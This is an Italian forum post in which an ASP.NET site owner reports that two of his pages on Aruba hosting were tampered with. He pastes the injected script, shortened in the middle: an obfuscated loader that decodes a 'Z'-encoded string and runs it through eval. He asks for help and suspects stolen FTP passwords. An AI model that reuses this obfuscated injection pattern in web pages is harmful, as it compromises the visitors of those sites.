Salve a tutti,
qualche giorno fà è successa una cosa strana, praticamente su due siti aspnet che gestisco mi sono ritrovato in uno il file default.aspx modificato e nell'altro il file home.aspx modificato con il seguente tag:
<script language="javascript">function t(){return z($a);}var $a="Z73tZ3dZ2... ...rZ69Z6eZ67()Z3b}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)== "Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>
ho messo i puntini in mezzo per abbrevviare il contenuto.
Premetto che sono su Aruba...
Il problema è che dopo aver ripristinato le rispettive pagine oggi su una delle due mi si è ripresentato il problema. Penso a sto punto che sia dovuto a qualche tipo di attacco, è successo anche a qualcuno di voi?
Avete idee in merito?
Potrebbe essere che mi abbiano "fregato" le pass ftp, come si può utilizzare l'ftp in modo sicuro?
